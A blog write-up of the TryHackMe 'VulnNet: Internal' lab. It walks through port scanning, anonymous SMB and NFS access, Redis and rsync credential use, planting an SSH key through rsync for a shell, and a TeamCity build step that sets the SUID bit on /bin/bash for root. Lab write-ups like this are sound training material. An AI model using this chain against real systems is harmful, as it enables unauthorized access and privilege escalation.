_  _              _
     ___  __| || |__  _ _  ___| |__
    / -_)/ _` || '_ \| '_|(_-<| / /
    \___|\__,_||_.__/|_|  /__/|_\_\
                    u/edbrsk's blog

TryHackMe Vulnet: Internal - Writeup

This is an easy/medium difficulty TryHackMe machine.

Challenge brief

VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.

There are four flags that need to be submitted in order to complete the challenge: - Service Flag - Internal Flag - User Flag - Root Flag


Nmap Scan

nmap -p- -sS -T5 --min-rate 1000 --max-retries=3 --open -vvv -n -Pn -oG allPorts

nmap -sC -sV -p22,111,139,445,873,2049,6379,40031,40423,44823,53943 -oN targeted

Port 139 & 445 - SMB

Let’s enumarate with enum4linux

enum4linux - a

|    Share Enumeration on   |
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        shares          Disk      VulnNet Business Shares
        IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on
//$   Mapping: DENIED, Listing: N/A
//   Mapping: OK, Listing: OK
//$     [E] Can not understand response:

| Users on via RID cycling (RIDS: 500-550,1000-1050) |

[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1569020563-4280465252-527208056
[I] Found new SID: S-1-5-32

[+] Enumerating users using SID S-1-5-21-1569020563-4280465252-527208056 and logon username '', password ''
S-1-5-21-1569020563-4280465252-527208056-513 VULNNET-INTERNAL\None (Domain Group)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
 S-1-22-1-1000 Unix User\sys-internal (Local User)

Let’s access to // with smbclient using a null session.

Inside /tmp we will get the services.txt flag

$ cat services.txt 

Port 2049 - nfs_acl

Port 2049 is open and noticed that there was a lot of output for port 111. I can see in the output for port 111, that the service NFS was present in the output. This indicates that I might be able to list and download (and maybe upload) files.

More about NFS:

mkdir /tmp/infosec
mount -t nfs /tmp/infosec

Port 6379 - Redis

Port 6379 is open, and now we have a password.

requirepass "B65Hx562...."

More about Redis:

redis-cli -h

AUTH B65Hx562....


keys *

GET "internal flag"

LRANGE "authlist" 0 100

Port 873 - Rsync

In the “authlist” key, we found a base64 encoded value, when decoded gives us the credentials for the rsync service.

More about Rsync:

nc -vn 873

@RSYNCD: 31.0

rsync rsync://rsync-connect@

rsync rsync://rsync-connect@

rsync rsync://rsync-connect@ .


Let’s get a shell

ssh-keygen -o

rsync -av id_rsa.pub rsync://rsync-connect@

ssh -i id_rsa sys-internal@

I now have a SSH access to the target machine.

Root Privilege Escalation - TeamCity

More about TeamCity:

ssh -L 8111: -i id_rsa sys-internal@

Taking a look into the server, inside /TeamCity/logs there is a file called catalina.out, there we can find the token to log in a super admin.


- Create a project
- Create a build configuration
- Search for build steps
    - New build step (command line)
    - script: `chmod +s /bin/bash`

- Run!

Share article